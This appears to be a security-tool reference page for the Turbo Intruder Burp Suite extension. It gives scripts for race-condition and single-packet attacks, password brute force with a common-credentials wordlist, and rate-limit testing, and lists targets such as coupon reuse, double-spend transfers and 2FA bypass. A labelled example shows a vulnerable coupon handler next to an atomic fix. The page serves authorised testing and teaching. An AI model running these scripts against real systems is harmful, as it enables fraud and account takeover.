Turbo Intruder

Burp extension for high-speed request sending

Description

Turbo Intruder is a Burp Suite extension for sending an extremely large number of HTTP requests at high speed. It uses a scripting engine for complete control over request timing — essential for race condition exploitation, brute force attacks, and single-packet attacks.

Installation

TEXT
# Burp Suite BApp Store
Burp → Extender → BApp Store → Search "Turbo Intruder" → Install

Basic Usage

PYTHON
# In Burp: Right-click request → Extensions → Turbo Intruder → Send to Turbo Intruder
# This opens the scripting interface

# Basic race condition script
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=30,
                          requestsPerConnection=100,
                          pipeline=True)
    
    # gate= holds each queued request back until the gate is opened
    for i in range(100):
        engine.queue(target.req, gate='race1')
    
    engine.openGate('race1')  # Release every request tagged 'race1' together

def handleResponse(req, interesting):
    if req.status == 200:
        table.add(req)

Advanced Usage

PYTHON
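# Each queueRequests below is a separate script; pair it with a handleResponse
# such as the one under Basic Usage.

# Single-packet attack (most reliable race condition)
# Requires an HTTP/2 target: Engine.BURP2 selects Burp's HTTP/2 stack.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=1,
                          requestsPerConnection=100,
                          pipeline=False,
                          engine=Engine.BURP2)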
    
    for i in range(20):
        engine.queue(target.req, gate='race1')
    
    engine.openGate('race1')

# Brute force with wordlist (the request must contain %s where each word is inserted)
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=5,
                          requestsPerConnection=100,
                          pipeline=True)
    
    for word in open('/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt'):
        engine.queue(target.req, word.rstrip())

# Rate limit testing
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                          concurrentConnections=100,
                          requestsPerConnection=10,
                          pipeline=True)
    
    for i in range(1000):
        engine.queue(target.req)

Common Race Condition Targets

TEXT
# Coupon/discount code redemption (apply same code multiple times)
# Money transfer (double-spend)
# Voting/rating systems (vote multiple times)
# Account creation (duplicate registration bypass)
# File upload (overwrite race)
# OTP/2FA verification (bypass rate limiting)
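
The server-side flaw behind the first target in the list (single-use coupon redemption), shown next to its fix. This is an added example, not code from the original page or from the Turbo Intruder project; `CouponStore`, `race` and the code `SAVE10` are constructed for illustration, and a barrier stands in for many requests arriving at the same instant.

```python
import threading

class CouponStore:
    """Constructed in-memory stand-in for a table of single-use coupon codes."""
    def __init__(self, codes):
        self._unused = set(codes)
        self._lock = threading.Lock()
        self.credits = []  # one entry per discount actually granted

    def redeem_check_then_act(self, code, user, window=lambda: None):
        # Vulnerable: the check and the state change are separate steps.
        if code not in self._unused:      # 1. check
            return False
        window()                          # gap in which other requests also pass the check
        self._unused.discard(code)        # 2. act, after the decision was already made
        self.credits.append((user, code))
        return True

    def redeem_atomic(self, code, user):
        # Hardened: check and state change are one indivisible step, the same idea as
        # UPDATE ... SET used = 1 WHERE code = ? AND used = 0, granting on one changed row.
        with self._lock:
            if code not in self._unused:
                return False
            self._unused.discard(code)
        self.credits.append((user, code))
        return True

def race(mode, n=20):
    """Send n simultaneous redemptions of one code; return (successes, credits)."""
    store = CouponStore({"SAVE10"})       # constructed sample code
    barrier = threading.Barrier(n)        # lines the n requests up
    results = []

    def worker(user):
        if mode == "check_then_act":
            # Barrier inside the gap: every request passes the check before any write.
            ok = store.redeem_check_then_act("SAVE10", user, window=barrier.wait)
        else:
            barrier.wait()                # same simultaneous arrival
            ok = store.redeem_atomic("SAVE10", user)
        results.append(ok)

    threads = [threading.Thread(target=worker, args=(u,)) for u in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results), len(store.credits)
```

With 20 simultaneous requests the check-then-act handler grants the discount 20 times, while the atomic handler grants it once and rejects the rest.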